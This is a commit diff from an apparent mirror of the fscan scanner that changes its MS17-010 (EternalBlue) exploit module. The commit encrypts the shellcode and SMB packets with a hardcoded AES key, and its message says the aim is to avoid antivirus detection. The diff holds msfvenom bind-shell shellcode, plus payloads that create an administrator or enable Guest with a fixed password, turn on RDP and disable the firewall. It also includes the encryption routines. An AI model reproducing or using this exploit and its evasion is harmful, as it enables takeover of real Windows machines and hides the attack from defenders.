mirror of https://github.com/qwqdanchun/fscan.git
Use aes encryption to store payloads to avoid AV detection
This commit is contained in:
kingpp
parent
38e48ba420
commit
769fc59fd1
|
|
@ -13,22 +13,32 @@ import (
|
|||
"time"
|
||||
)
|
||||
|
||||
|
||||
|
||||
func MS17010EXP(info *common.HostInfo) {
|
||||
address := info.Host + ":445"
|
||||
var sc string
|
||||
var sc_enc string
|
||||
switch common.SC {
|
||||
case "bind":
|
||||
//msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex
|
||||
sc = "fc4881e4f0ffffffe8cc0000004151415052514831d25665488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed52488b52208b423c4801d0668178180b0241510f85720000008b80880000004885c074674801d050448b40204901d08b4818e3564d31c948ffc9418b34884801d64831c041c1c90dac4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b0488415841584801d05e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e54831c0505049c7c40200fc1341544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a025950504d31c94d31c048ffc04889c241baea0fdfe0ffd54889c76a1041584c89e24889f941bac2db3767ffd54831d24889f941bab7e938ffffd54d31c04831d24889f941ba74ec3be1ffd54889f94889c741ba756e4d61ffd54881c4b00200004883ec104889e24d31c96a0441584889f941ba02d9c85fffd54883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd54801c34829c64885f675e141ffe7586a005949c7c2f0b5a256ffd5"
|
||||
//msfvenom -p windows/x64/shell/bind_tcp LPORT=65432 -f hex
|
||||
sc_enc = "aZ6HT8SGMKV04q20dOnyPK9qjjUZ4mq6l9SOxMKj0K7Uyq/ugxauU7KF3KrLhSUqfHkXdTU4C9iecU7qY5AjzF8Pe91258pbPpDJ/2FqrW4XD7RODvAKmJ175YEyRo+y0hV7aav0aa5wcpm6psV6Soq8vx8Q83fR2xSvTRtJMo96dZxCUWmuzZUF+91sYw4O3OeV/EzhZ40yJ2FGUovIJnDmsX8Vn/va3V5OONhmpXJYnrjj4QuFPkEpZi6nmhdr1gmzMq7YNP0aphUjlWuczX8v5ug6ZslVGuPjeYYonaAWKiNU2xPb8U2BuXPFEyG2PF5B8Q/XDhRKMX717QmAYX1kBeJClPPLiHV8uybI54m7t3S3JoFIO196MOFaWlFv+X+scB55bIKqtczndrWohujiJMKguyBfkdDmMvJ+NIoYmTJB+jf75S/HXQgHjCOZH9ARHyVkiYgT7WvFTxSP+qfNdbHIWK+uduT6nkCPHW7mxdlNR0fkncCpMPuR43kvtL4uUfCEmNufuZrLxr3kHeW8g1u9qLh2tq+w3qYBsIfJ7iYA3bDlpk751b8MJ+azvwK1/a/l0MXuSVMTbWMeKKefuwVmAUp5T7k8mWpA7+cu201DckYUQWaAW/p6YehYPMJ0b6kTV2LocHJinCQjAXCxa5YDCnqz6tVFtS7X0vreELXwXT6zqcs/W3xxfj3oVFgYsnwpTSa+d8A241ZJsz/0hhyIPE8LCi3+PeVvUwv7BJgIvJWdXd4CHx6y+QLiiNb8h2fyIt3e3v4pQFfvklhgXeCzCrA0dqiyMNR+W6NR3QAWQdhEKjkFPPzWYTB9q7mhToXAQSZgDw0eHEDpEudbYUalPlX3p83Wc2YS+lvr73uuhZ0VVTq/JWgmt/xZtfvKvZMYCG6UhayCyJyVperD2PP+dd99rUNa7dE6tKTflw0NMF0/zSFohby6fJoq1HxYLBScpi/d9qG/rKexovoUjsK7HtNQ/SI3cDQ6/qpOa54aBJHPf1+FrraaY/aKBOFBstNJkBTGGMEGW02kEmujZMJBhztUFwmvtXGoiOGK2jIGpamFg/dhAvnBDzkFzSMMKpxNo+1se2QzSNO59B66SGDd4bdUKEFzlvXGb/ZwtR1MVjINu0PpxKOmm72u/sfA2/cPe/bhdeP4+I3wSQjJavIHu8VBbneJrcj3BOFyMCI2ZL4FX9Qtefd8pnoBmli5bD9UqB4C9MYPj+gg3LBr5HX9Rr/qfDsjC/GyjOyJp3yLRK1WlLQqNuGmOHWggXbaWKrnO3swXHXkTlCfUWrCkdgdk9enytJZa6O5/6GzHi1/TDxRv/BZoUj+H4d6"
|
||||
sc = AesDecrypt(sc_enc,key)
|
||||
|
||||
case "cs":
|
||||
//cs gen C shellcode -> fmt.Printf("%x", c) -> hex
|
||||
sc = ""
|
||||
case "add":
|
||||
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user sysadmin "1qaz@WSX!@#4" /ADD && net localgroup Administrators sysadmin /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex
|
||||
sc = "fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbe01d2a0a41baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5636d642e657865202f63206e657420757365722073797361646d696e20223171617a405753582140233422202f414444202626206e6574206c6f63616c67726f75702041646d696e6973747261746f72732073797361646d696e202f414444202626205245472041444420484b4c4d5c53595354454d5c43757272656e74436f6e74726f6c5365745c436f6e74726f6c5c5465726d696e616c222022536572766572202f76206644656e795453436f6e6e656374696f6e73202f74205245475f44574f5244202f64203030303030303030202f66202626206e65747368206164766669726577616c6c2073657420616c6c70726f66696c6573207374617465206f666600"
|
||||
sc_enc = "+w7eqC9F3rooElUlkRIf1tMg3KRpITKJdr1gjhO38bzwuDjLOdukKCR3Std9dzwcUZMUISTfilK/XkPhSjGFe63XGjDnZdr6b+IrB6CRbO/PYUJd7c7xKFKhr52DJFts/m4RHW6Ka0k/j8OqO9VmI75ze6A34QXtTLgV+zzPNImjzCeY5Cf4h0VZI32v280faebVOUFZ77v4OJMnDad4S1/fpbDLeHObigG5K9lzmZfvBGz+PySW2YONb3lBPlAtO1jD62ySX/Nj2Jec/QKmDxQuryEvlAgU0bZxV6Z1XCdJO+HLMLrxu1AhuGp/BsXzoixhUjWPBBJMeyPe+EiAtn27pwI2QCinBqMuK/mYW96Pf+qW4y4X001+dzp8snb76BRFqbsV+Wh0Ot5ctEqyCrI5gfP5rWCqjgqLHdTWNKWCeE9aZs6Lxl6J6f6XMoFKJ/b/Xc279ak+zJcdzi+BGHNCnlFGR+SZtVVm3ASYmw0OzRmbztyt4DRcxlRV+7EFdsGzerbdLz+hoURk6tUBluSfV2yo+qch/QJ7CXRgFR5STd+9Emj3zNAg8LLK7u/lv8tr0GCcAC0BMdozPnCzj/AkWidL7/1xojCdQ8s3stm0Dn8YTo6RX3GcPIduoIo2ge4KP6ADvAsQ8pekrUTkmC3pNGT3hDiT2Li84GQ0BhQqih7BItuE4hpHwGhnq+6ij9AGS3xdBS/NqODMU54WOeoqUrSp+nLN9n61qbXHr83q1PmNJFYJ5ptNobeicwWcHxZADHpT3O8KU5H9nsYNfnlABv1FGA2tgWaZjA4iqgzNGQF2dnFWAxUIxwaF3C+DLrvu8WONZaEYlnI7THq/xxGitHt8OnN5AY8FKU8zq6FQt4kRfOm5TO4pACbSKm/9n7EOXZ78GuMYeFaW56xqdJjFsbHvi8yJLIn9hOBjoSPL6Hg+cNijhayKMUc7rtLiqQd81kPaX7xDMusufsiekIySeWjWXZlQt+0tBveK56zzUGJIjAFaKK+VtPZcRyoFiU598OeS0ZPO3UP+nKi0uvhTEnT7KBjE4xAEHvX41P3u9lJIeaIewbqgsHgDSOrU1StCfqT+xO5Ltyy+1e2jDT2H2nquN9BGvdfxsNaGYnsodliKpmL77LsZAFdXyiiAu1Xb5DJhwJGO1Zi156HMC3tGWer5SF5M5H/ufENNxds632lqew2C7dkgLuEMDr+URldG2JMozhHc0u1VkqqlrbVEqnjNU+4D0Gne9pCVd06UhrrRDO6DdfFaYAfp+rz0EURo6CSoMsVIkJETPaVEhHD1qDi7S4p98Mu8aYnzBQpf9uUULrI3UQWHsGfG7iXVLCPwX6zUVE5LYb7JUsAFxvdoGbHjUMOJXGfM4HMQXB1PXXzQmyvLGDLNeLJ71EgE"
|
||||
sc = AesDecrypt(sc_enc,key)
|
||||
|
||||
case "guest":
|
||||
//msfvenom -p windows/x64/exec EXITFUNC=thread CMD='cmd.exe /c net user Guest /active:yes && net user Guest "1qaz@WSX!@#4" && net localgroup Administrators Guest /ADD && REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f && netsh advfirewall set allprofiles state off' -f hex
|
||||
sc = "fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbe01d2a0a41baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd5636d642e657865202f63206e65742075736572204775657374202f6163746976653a796573202626206e6574207573657220477565737420223171617a405753582140233422202626206e6574206c6f63616c67726f75702041646d696e6973747261746f7273204775657374202f414444202626205245472041444420484b4c4d5c53595354454d5c43757272656e74436f6e74726f6c5365745c436f6e74726f6c5c5465726d696e616c222022536572766572202f76206644656e795453436f6e6e656374696f6e73202f74205245475f44574f5244202f64203030303030303030202f66202626206e65747368206164766669726577616c6c2073657420616c6c70726f66696c6573207374617465206f666600"
|
||||
sc_enc = "aZ6HT8SGMKV04q20dOnyPK9qjjUZ4mq6l9SOxMKj0K4lzrg1xPglYpF+v97tP3F9ViX/X44PY0NKKhJgtlWMAYV+lsvIrCyxdhxk+venYJW8R0Cw5vTbuaXlnWmba2ZbUrnZpoJVfJpJNjBnTNFkedK3LCFYLyPBJtwbaT5azGUmO0pkOtGthnPx4C5eUhplZihuJAD/pNtcJ71o/rLkw+JH0Mz+5DzN5T+dbAi8LuBtGMYBaVRtSVrZ+ZZtWEf8ZT1UIMD7druVl+elrJ5LBgcUU9hdH61cPUYgsPaytwxOG9BCJKasdW++NthXGlR6vO0JtJUHnYuFm1saHOkSYAn5U96LkAMYIZ78P7M2upUKnOah/ND5W06yW8oYdGVq7ACsyjrf8UNkVSpedg9EMRwKBJi2wEAzfUkl+USH7gOhbzm2D/ctz2CZEldptuu25jppiVqe2v7MKSRkp1WVipAywemUjZZ9OfDY+jOD6dB5w+vDy++7YJuwtK1ANdUVHhhgxHbfV/2/EtKrm76y/PJTGxTVObnJcajrP5mRy/7hDDo/i+sreXD92TQc1qbEvfi/7oJLy4OTvdTt1/tfSdr9pnQZPqD6gIgSHUvKb1McLL8JS3VgUMW5aSV+7CIAAIPrn+G4B6hH1+Bb0z0AIEnciCml2GUXj56fGwCT9rH7ONKpgwWYxmFi5qFF2Znts/UOsPGXWnOjW7fbX5YdkqfbsbNdfy69eRVi6xqRJ0gJU7GHoyl9mWqGz2VcRe1tU6BusAVe3vEToCtgUpCltPKk8Bci3P86mlzDRGpnFMXtvBf+4/BvAPRy3SgbddGcBq/TR+kol420b5Vk5qKs5dwtOrMp0V99VqfyxriqUSB42oA3gNlaSbwcttQzXX918DAgBlHIrVO+QaOQNBkTdvNLPWT1slW62jNjtmQz63TFrlz5qRmjE0tOPquZxB9z0NGqhLkG2vHfPmCMG2g9vHpXCDoKeVB0Hf2Air5MMPr8I426/DTHIQMMxMyC0IRz0MAcXh7W0Je5S42F2dfTc4VOnScCFUrlzLJw9QxyoDN6XJyr54Lu+GGhS+pDPwKLhhs+CK5Crl2CYLqMG1AoSrveY7+okMIYUhinXuC9V80SYDUXWg3E+PH34ULftgsemNhLmY2VxlO6vDZu28cRybrB6wvt0yeOECzYMIwrRCD73s+nIclbiiynBl7EfNo1ICwzpVMalHum11OObK7zBC7Wu/dAnoj0fs5phgoh9TNpmNDZRPWnT/SxoBOau6TZKAq/wiTyXbfRmL10jWmKnnVdr264863of/jiKm9X/RqMCrt9ECrX6XJckSAxFSry"
|
||||
sc = AesDecrypt(sc_enc,key)
|
||||
|
||||
|
||||
default:
|
||||
if strings.Contains(common.SC, "file:") {
|
||||
read, err := ioutil.ReadFile(common.SC[5:])
|
||||
|
|
|
|||
|
|
@ -8,14 +8,76 @@ import (
|
|||
"github.com/shadow1ng/fscan/common"
|
||||
"strings"
|
||||
"time"
|
||||
"bytes"
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"encoding/base64"
|
||||
)
|
||||
|
||||
func AesEncrypt(orig string, key string) string {
|
||||
// 转成字节数组
|
||||
origData := []byte(orig)
|
||||
k := []byte(key)
|
||||
// 分组秘钥
|
||||
// NewCipher该函数限制了输入k的长度必须为16, 24或者32
|
||||
block, _ := aes.NewCipher(k)
|
||||
// 获取秘钥块的长度
|
||||
blockSize := block.BlockSize()
|
||||
// 补全码
|
||||
origData = PKCS7Padding(origData, blockSize)
|
||||
// 加密模式
|
||||
blockMode := cipher.NewCBCEncrypter(block, k[:blockSize])
|
||||
// 创建数组
|
||||
cryted := make([]byte, len(origData))
|
||||
// 加密
|
||||
blockMode.CryptBlocks(cryted, origData)
|
||||
return base64.StdEncoding.EncodeToString(cryted)
|
||||
}
|
||||
func AesDecrypt(cryted string, key string) string {
|
||||
// 转成字节数组
|
||||
crytedByte, _ := base64.StdEncoding.DecodeString(cryted)
|
||||
k := []byte(key)
|
||||
// 分组秘钥
|
||||
block, _ := aes.NewCipher(k)
|
||||
// 获取秘钥块的长度
|
||||
blockSize := block.BlockSize()
|
||||
// 加密模式
|
||||
blockMode := cipher.NewCBCDecrypter(block, k[:blockSize])
|
||||
// 创建数组
|
||||
orig := make([]byte, len(crytedByte))
|
||||
// 解密
|
||||
blockMode.CryptBlocks(orig, crytedByte)
|
||||
// 去补全码
|
||||
orig = PKCS7UnPadding(orig)
|
||||
return string(orig)
|
||||
}
|
||||
//补码
|
||||
//AES加密数据块分组长度必须为128bit(byte[16]),密钥长度可以是128bit(byte[16])、192bit(byte[24])、256bit(byte[32])中的任意一个。
|
||||
func PKCS7Padding(ciphertext []byte, blocksize int) []byte {
|
||||
padding := blocksize - len(ciphertext)%blocksize
|
||||
padtext := bytes.Repeat([]byte{byte(padding)}, padding)
|
||||
return append(ciphertext, padtext...)
|
||||
}
|
||||
//去码
|
||||
func PKCS7UnPadding(origData []byte) []byte {
|
||||
length := len(origData)
|
||||
unpadding := int(origData[length-1])
|
||||
return origData[:(length - unpadding)]
|
||||
}
|
||||
|
||||
var (
|
||||
negotiateProtocolRequest, _ = hex.DecodeString("00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
|
||||
sessionSetupRequest, _ = hex.DecodeString("00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
|
||||
treeConnectRequest, _ = hex.DecodeString("00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
|
||||
transNamedPipeRequest, _ = hex.DecodeString("0000004aff534d42250000000018012800000000000000000000000000088ea3010852981000000000ffffffff0000000000000000000000004a0000004a0002002300000007005c504950455c00")
|
||||
trans2SessionSetupRequest, _ = hex.DecodeString("0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
|
||||
key ="0123456789topsec"
|
||||
negotiateProtocolRequest_enc ="PnS50rhbh1nkb4JDjAnoOuFjxijddlAUbLUDi6xFyu5FGu3ui3aKZg7uqp/KfbQdSL1oEjs+/vXFWUrIaX5UGuEzNMwMbbLjRJjRqnrxi9puFZlBy92ioaf/0eVPeVsd/y21mEz0uWxYrw1Q5OJO9ibgKVFWBwH4oDSJgfwIRRI/Erob5s1WwVOTKRFwbbwKkaNi2OPSok4Qit4Be5/Ugl0P4iXal47TgUouo/Tnm/hafQuiUEnU/NHgwyax8O0WEkBBV9RQ6tEIpyGBoVXqNHBD2svOLCHXtOZ0JR8lpmBbVqVYmOnbvC/TtUphlltyD2XaI2eM6P9snMEs/tH6AjvSzy4MiArc2ehCvI8KkrzRr2Ely6+sQPikE4ILDXJV"
|
||||
sessionSetupRequest_enc ="OSuNN6y67H6V31XBAy0ObMjquG9VG30Be+HtUPppjqzUa+j1Sb1RXnlMhmNKBfdA060UgJhPAWEA0mHvgtuZINyl673/8Gly0NYdXSDAsvHsrUZZ4F/ghxQlRasFqo91RTCYyT2uR2mblhUC8HbEPjgUCmbGG4JGACJRMtHrWMAEyynCLd+RGGAUp5rceIaeEnHSUOjs1IIyjfmsi0HxdjNYlNX2BvFe5saBdjc92k3RQrYruaN6Y4eKMAZcR188ZF9UDelR3OP+guwAmOs6DfvNoo+f236V2Vfofq9y66/aKE5Z6pIF1+d5J+kPiYgyC4pt59rRR5lAW8VNS18frmeaob/f3DhikECQRxLyHs4oFiWKpVLq6Gw4eR0Xg6LR"
|
||||
treeConnectRequest_enc ="Io2yBzE7AkWMamTGFTL9O7P9ExaQpPaIEO/w+j1dFE/2ZQtpWH36u7Kv6Sj962hbLoT0EbqKeh7OzgDVkdz4DIeFapPixtiGQ8bI5Gl+NDUB3gdWDei9HNVbpGV2v/2tMF/hFesLnPLlB5m1mVweDofFPNwexEzHSaDYcBD4wddaX/N8qPdxKUx3inIMd4kKLnKyq5lyqerqG1XLvyB3XFHmWrGsg57YNMOJR4j4T3N/ydl3B92FcO6zH0qntEn4dsWinnutQznDHQ1AuV1Bag=="
|
||||
transNamedPipeRequest_enc ="Tudw0vZes6K4es+7e3d3wwSSJ4MwynBWhFM5oH+z1gNUbPCKa6XjKwyeD+PT/PNHnp+Tl7RDHVq3TOMQgCgQBXP02QeO2oW6adqUOLIBIIyhrPdWHP2Z7wrQNuwHoS2DgSDpBneQqnJcfVjv8dYFzYENz3oIYX74IkAgHb+NCAPwNdVkDLjm5Z0qG4Qu40V/2kNgNjLP0ucy3oSoPL6FFQ=="
|
||||
trans2SessionSetupRequest_enc ="rJEocuY9iMIM8KGtr4RlvGxp6meKD7h/ROQSKYiLQ6m5p1Qa3vrDkengdGcp930bh39NIW21eKe1Zr2dt/zXB6lYlXmQ/bgAsNEQW2cvWMs1yA2z8Ua6SIq46DynJDCQV2oWTuYKaqcy68Tno91vHsO8khooMT7bzx4EUbgN9zhKva/CkTKPXOrHBjcF9Wpv5XJDCmhLAD5EqL317Cdqgfcd+59kitYFva7N2st4aMc="
|
||||
negotiateProtocolRequest, _ = hex.DecodeString(AesDecrypt(negotiateProtocolRequest_enc, key))
|
||||
sessionSetupRequest, _ = hex.DecodeString(AesDecrypt(sessionSetupRequest_enc, key))
|
||||
treeConnectRequest, _ = hex.DecodeString(AesDecrypt(treeConnectRequest_enc, key))
|
||||
transNamedPipeRequest, _ = hex.DecodeString(AesDecrypt(transNamedPipeRequest_enc, key))
|
||||
trans2SessionSetupRequest, _ = hex.DecodeString(AesDecrypt(trans2SessionSetupRequest_enc, key))
|
||||
|
||||
)
|
||||
|
||||
func MS17010(info *common.HostInfo) error {
|
||||
|
|
|
|||
Loading…
Reference in New Issue